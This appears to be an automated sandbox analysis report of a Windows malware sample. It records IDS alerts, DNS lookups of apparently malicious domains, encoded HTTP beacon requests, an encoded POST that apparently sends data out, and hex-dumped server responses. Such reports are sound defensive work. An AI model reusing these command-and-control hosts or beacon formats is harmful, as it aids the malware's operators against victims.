            Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
            Source: Joe Sandbox ViewASN Name: CONTABODE CONTABODE
            Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 52.149.20.212:443 -> 192.168.2.4:55453
            Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 52.149.20.212:443 -> 192.168.2.4:49730
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exeCode function: 0_2_0044289D InternetQueryDataAvailable,InternetReadFile,0_2_0044289D
            Source: global trafficHTTP traffic detected: GET /4snq/?zhl=sdH/WbEy6w4fbVGTq9TqooXc2+84tGl6rFb6/eES0khOL/XioS6AKYaJ1BDLndLagFW2QAKxeq+tE1rAXqYu5rfm3z/1IJXzLuu54LPR0VmTOFYhtf9kUlg=&X8Rx1=znhhIbB8nN HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.wcm50.topConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; SGH-T889 Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
            Source: global trafficHTTP traffic detected: GET /frpa/?X8Rx1=znhhIbB8nN&zhl=24K/DZkmoc7bHzW+Clhod14EO+WVCLplL8BuA7PGHf8qDHCdDnlgU8fv6Zi4ouLCHtMfxhN5psYeEWHEa5SDdP5UtNzqgNLmQXsJ8/qLKwWQm26aR0vbL2E= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.onemart.siteConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; SGH-T889 Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
            Source: global trafficHTTP traffic detected: GET /tpid/?zhl=engtnyTNtTQDWNNE7yJ78I7feV66GlGe8mJE780+4T661tYAjJ0+Tu/RlOqq0mFfSRMDbaNY7odrQC55001RANar5S3nmyGvU4LO7et061dPBL96f2mSZAk=&X8Rx1=znhhIbB8nN HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.lanxuanz.techConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; SGH-T889 Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
            Source: global trafficHTTP traffic detected: GET /8r0w/?X8Rx1=znhhIbB8nN&zhl=dzLnp/+gugxgWqqjxp0mT2IbFg5vFvQvzyx0DqvE635uns4HxFL1cM/nxlijH3CXr4Dn+r6a2xCcjbq3+Q1mOYlqiQ0t9purOwXAnxy8DKlJc7DWVLNExsI= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.komart.shopConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; SGH-T889 Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
            Source: global trafficHTTP traffic detected: GET /szao/?zhl=xOsStlDAPOZpiXvsnmuwA88PT6OXK0eKU2uFkXlZ1FsWMYGKmmEGy9m/gq1jsAT5roDCFnYyY1aFVaz80OwxPCjqIvTp6x+JqjH2NXebd4izNju9X+dPpzI=&X8Rx1=znhhIbB8nN HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.teerra.shopConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; SGH-T889 Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
            Source: global trafficHTTP traffic detected: GET /p6ze/?X8Rx1=znhhIbB8nN&zhl=/DXHDBoOk7chmVCQ4WrLaW1oMwdAaAsuBp0o9+oEddPaOIwOYOKBw5izboW0tBTgA9UkGMI+Rx3Lys9/a+AsrILRafTHrYx9fF0ImMQ3N0L+QaVHJSdbugw= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.dverkom.storeConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; SGH-T889 Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
            Source: global trafficHTTP traffic detected: GET /s20z/?zhl=OlftTQ9hFz7OT6WFYxCuNpq7ExDWc0YdDdpK6+ifbkXRCNh9PINbo2rFvrFH3ENsTzWiAtX7VHJc4HngX2meKMfLmgA8ppz9ceAA4uFOpb8+rhwBxtyr4dg=&X8Rx1=znhhIbB8nN HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.dalong.siteConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; SGH-T889 Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
            Source: global trafficHTTP traffic detected: GET /jkxr/?X8Rx1=znhhIbB8nN&zhl=nfZmoz3ZNLa38WJC9Znh/BTcpJZiT6WI1J67BrQcysz4VkbFIz1C0Mwuu1KgUH3yzYFpHG8bYhuiS80nX0UZ0iO0BQhIJ00ZnTsDdGtBOXLHdb2igebUo2U= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.030002304.xyzConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; SGH-T889 Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
            Source: global trafficHTTP traffic detected: GET /9u26/?zhl=1KzGVmvOKYmCo1wpuW+r8NP8l/V7/SD2qfM36nKJjIWw5yRzOpl1V5yMlKb+oB0ZkJTr7r2IK3XtbWcKe6/PEalDkn3qwfCmDnUmPcfDndNPzM6SEYrZbR4=&X8Rx1=znhhIbB8nN HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.polarmuseum.infoConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; SGH-T889 Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
            Source: global trafficDNS traffic detected: DNS query: www.wcm50.top
            Source: global trafficDNS traffic detected: DNS query: www.everycreation.shop
            Source: global trafficDNS traffic detected: DNS query: www.onemart.site
            Source: global trafficDNS traffic detected: DNS query: www.lanxuanz.tech
            Source: global trafficDNS traffic detected: DNS query: www.komart.shop
            Source: global trafficDNS traffic detected: DNS query: www.teerra.shop
            Source: global trafficDNS traffic detected: DNS query: www.dverkom.store
            Source: global trafficDNS traffic detected: DNS query: www.dalong.site
            Source: global trafficDNS traffic detected: DNS query: www.030002304.xyz
            Source: global trafficDNS traffic detected: DNS query: www.polarmuseum.info
            Source: global trafficDNS traffic detected: DNS query: www.growdigitally.net
            Source: unknownHTTP traffic detected: POST /frpa/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflateHost: www.onemart.siteOrigin: http://www.onemart.siteConnection: closeContent-Length: 200Content-Type: application/x-www-form-urlencodedCache-Control: no-cacheReferer: http://www.onemart.site/frpa/User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; SGH-T889 Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30Data Raw: 7a 68 6c 3d 37 36 69 66 41 73 73 2f 6f 70 44 71 64 6b 57 6e 49 46 35 6b 61 48 70 5a 4d 50 71 79 4f 36 52 37 55 4b 46 53 4d 37 2f 64 47 2f 6b 6f 42 6d 69 70 4f 55 52 64 61 36 66 54 6e 39 6d 51 7a 4f 44 2f 54 62 55 38 38 79 70 58 76 38 55 6b 50 6c 54 5a 66 35 2b 44 59 76 6b 39 6c 39 50 43 6e 64 66 41 52 57 39 58 33 38 75 37 4b 79 79 4e 74 69 69 73 64 47 7a 64 4c 46 75 70 2b 74 73 66 56 70 78 47 67 4c 62 6f 64 51 54 42 41 41 30 2f 4a 44 2f 49 30 6b 34 4d 61 61 64 56 56 57 71 58 64 71 6d 4e 32 51 75 78 45 4a 39 4f 30 35 34 53 50 70 32 77 31 4f 78 54 74 4e 4a 41 65 51 64 2b 2f 71 66 58 74 67 3d 3d Data Ascii: zhl=76ifAss/opDqdkWnIF5kaHpZMPqyO6R7UKFSM7/dG/koBmipOURda6fTn9mQzOD/TbU88ypXv8UkPlTZf5+DYvk9l9PCndfARW9X38u7KyyNtiisdGzdLFup+tsfVpxGgLbodQTBAA0/JD/I0k4MaadVVWqXdqmN2QuxEJ9O054SPp2w1OxTtNJAeQd+/qfXtg==
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 05 Nov 2024 14:22:56 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66a62026-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 05 Nov 2024 14:23:20 GMTServer: ApacheContent-Length: 13928Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4d 61 6b 61 61 6e 20 2d 20 52 65 61 6c 20 45 73 74 61 74 65 20 48 54 4d 4c 20 54 65 6d 70 6c 61 74 65 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 22 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 22 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3e 0d 0a 0d 0a 20 20 20 20 3c 21 2d 2d 20 46 61 76 69 63 6f 6e 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 69 6d 67 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 72 65 6c 3d 22 69 63 6f 6e 22 3e 0d 0a 0d 0a 20 20 20 20 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 57 65 62 20 46 6f 6e 74 73 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 32 3f 66 61 6d 69 6c 79 3d 48 65 65 62 6f 3a 77 67 68 74 40 34 30 30 3b 35 30 30 3b 36 30 30 26 66 61 6d 69 6c 79 3d 49 6e 74 65 72 3a 77 67 68 74 40 37 30 30 3b 38 30 30 26 64 69 73 70 6c 61 79 3d 73 77 61 70 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 20 20 20 20 0d 0a 20 20 20 20 3c 21 2d 2d 20 49 63 6f 6e 20 46 6f 6e 74 20 53 74 79 6c 65 73 68 65 65 74 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 66 6f 6e 74 2d 61 77 65 73 6f 6d 65 2f 35 2e 31 30 2e 30 2f 63 73 73 2f 61 6c 6c 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 6a 73 64 65 6c 69 76 72 2e 6e 65 74 2f 6e 70 6d 2f 62 6f 6f 74 73 74 72 61 70 2d 69 63 6f 6e 73 40 31 2e 34 2e 31 2f 66 6f 6e 74 2f 62 6f 6f 74 73 74 72 61 70 2d 69 63 6f 6e 73 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 20 20 20 20 3c 21 2d 2d 20 4c 69 62 72 61 72 69 65
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 05 Nov 2024 14:23:22 GMTServer: ApacheContent-Length: 13928Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4d 61 6b 61 61 6e 20 2d 20 52 65 61 6c 20 45 73 74 61 74 65 20 48 54 4d 4c 20 54 65 6d 70 6c 61 74 65 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 22 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 22 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3e 0d 0a 0d 0a 20 20 20 20 3c 21 2d 2d 20 46 61 76 69 63 6f 6e 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 69 6d 67 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 72 65 6c 3d 22 69 63 6f 6e 22 3e 0d 0a 0d 0a 20 20 20 20 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 57 65 62 20 46 6f 6e 74 73 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 32 3f 66 61 6d 69 6c 79 3d 48 65 65 62 6f 3a 77 67 68 74 40 34 30 30 3b 35 30 30 3b 36 30 30 26 66 61 6d 69 6c 79 3d 49 6e 74 65 72 3a 77 67 68 74 40 37 30 30 3b 38 30 30 26 64 69 73 70 6c 61 79 3d 73 77 61 70 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 20 20 20 20 0d 0a 20 20 20 20 3c 21 2d 2d 20 49 63 6f 6e 20 46 6f 6e 74 20 53 74 79 6c 65 73 68 65 65 74 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 66 6f 6e 74 2d 61 77 65 73 6f 6d 65 2f 35 2e 31 30 2e 30 2f 63 73 73 2f 61 6c 6c 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 6a 73 64 65 6c 69 76 72 2e 6e 65 74 2f 6e 70 6d 2f 62 6f 6f 74 73 74 72 61 70 2d 69 63 6f 6e 73 40 31 2e 34 2e 31 2f 66 6f 6e 74 2f 62 6f 6f 74 73 74 72 61 70 2d 69 63 6f 6e 73 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 20 20 20 20 3c 21 2d 2d 20 4c 69 62 72 61 72 69 65
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 05 Nov 2024 14:23:25 GMTServer: ApacheContent-Length: 13928Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4d 61 6b 61 61 6e 20 2d 20 52 65 61 6c 20 45 73 74 61 74 65 20 48 54 4d 4c 20 54 65 6d 70 6c 61 74 65 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 22 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 22 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3e 0d 0a 0d 0a 20 20 20 20 3c 21 2d 2d 20 46 61 76 69 63 6f 6e 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 69 6d 67 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 72 65 6c 3d 22 69 63 6f 6e 22 3e 0d 0a 0d 0a 20 20 20 20 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 57 65 62 20 46 6f 6e 74 73 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 32 3f 66 61 6d 69 6c 79 3d 48 65 65 62 6f 3a 77 67 68 74 40 34 30 30 3b 35 30 30 3b 36 30 30 26 66 61 6d 69 6c 79 3d 49 6e 74 65 72 3a 77 67 68 74 40 37 30 30 3b 38 30 30 26 64 69 73 70 6c 61 79 3d 73 77 61 70 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 20 20 20 20 0d 0a 20 20 20 20 3c 21 2d 2d 20 49 63 6f 6e 20 46 6f 6e 74 20 53 74 79 6c 65 73 68 65 65 74 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 66 6f 6e 74 2d 61 77 65 73 6f 6d 65 2f 35 2e 31 30 2e 30 2f 63 73 73 2f 61 6c 6c 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 6a 73 64 65 6c 69 76 72 2e 6e 65 74 2f 6e 70 6d 2f 62 6f 6f 74 73 74 72 61 70 2d 69 63 6f 6e 73 40 31 2e 34 2e 31 2f 66 6f 6e 74 2f 62 6f 6f 74 73 74 72 61 70 2d 69 63 6f 6e 73 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 20 20 20 20 3c 21 2d 2d 20 4c 69 62 72 61 72 69 65
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 05 Nov 2024 14:23:28 GMTServer: ApacheContent-Length: 13928Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4d 61 6b 61 61 6e 20 2d 20 52 65 61 6c 20 45 73 74 61 74 65 20 48 54 4d 4c 20 54 65 6d 70 6c 61 74 65 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 22 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 22 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3e 0d 0a 0d 0a 20 20 20 20 3c 21 2d 2d 20 46 61 76 69 63 6f 6e 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 69 6d 67 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 72 65 6c 3d 22 69 63 6f 6e 22 3e 0d 0a 0d 0a 20 20 20 20 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 57 65 62 20 46 6f 6e 74 73 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 32 3f 66 61 6d 69 6c 79 3d 48 65 65 62 6f 3a 77 67 68 74 40 34 30 30 3b 35 30 30 3b 36 30 30 26 66 61 6d 69 6c 79 3d 49 6e 74 65 72 3a 77 67 68 74 40 37 30 30 3b 38 30 30 26 64 69 73 70 6c 61 79 3d 73 77 61 70 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 20 20 20 20 0d 0a 20 20 20 20 3c 21 2d 2d 20 49 63 6f 6e 20 46 6f 6e 74 20 53 74 79 6c 65 73 68 65 65 74 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 66 6f 6e 74 2d 61 77 65 73 6f 6d 65 2f 35 2e 31 30 2e 30 2f 63 73 73 2f 61 6c 6c 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 